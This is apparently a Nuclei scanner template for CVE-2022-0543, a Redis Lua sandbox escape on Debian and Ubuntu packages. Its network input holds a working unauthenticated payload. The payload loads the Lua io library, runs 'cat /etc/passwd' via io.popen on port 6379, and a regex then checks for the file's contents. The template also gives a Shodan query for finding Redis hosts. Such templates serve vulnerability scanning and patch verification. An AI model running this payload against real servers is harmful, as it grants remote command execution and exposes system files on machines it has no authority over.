id: CVE-2022-0543

info:
  name: Redis Sandbox Escape - Remote Code Execution
  author: dwisiswant0
  severity: critical
  description: |
    This template exploits CVE-2022-0543, a Lua-based Redis sandbox escape. The
    vulnerability was introduced by Debian and Ubuntu Redis packages that
    insufficiently sanitized the Lua environment. The maintainers failed to
    disable the package interface, allowing attackers to load arbitrary libraries.
  reference:
    - https://www.ubercomp.com/posts/2022-01-20_redis_on_debian_rce
    - https://attackerkb.com/topics/wyA1c1HIC8/cve-2022-0543/rapid7-analysis#rapid7-analysis
    - https://bugs.debian.org/1005787
    - https://www.debian.org/security/2022/dsa-5081
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2022-0543
  metadata:
    shodan-query: redis_version
  tags: cve,cve2022,network,redis,unauth,rce

network:
  - inputs:
      - data: "eval 'local io_l = package.loadlib(\"/usr/lib/x86_64-linux-gnu/liblua5.1.so.0\", \"luaopen_io\"); local io = io_l(); local f = io.popen(\"cat /etc/passwd\", \"r\"); local res = f:read(\"*a\"); f:close(); return res' 0\r\n"

    host:
      - "{{Hostname}}"
      - "{{Host}}:6379"
    read-size: 64

    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

# Enhanced by mp on 2022/05/18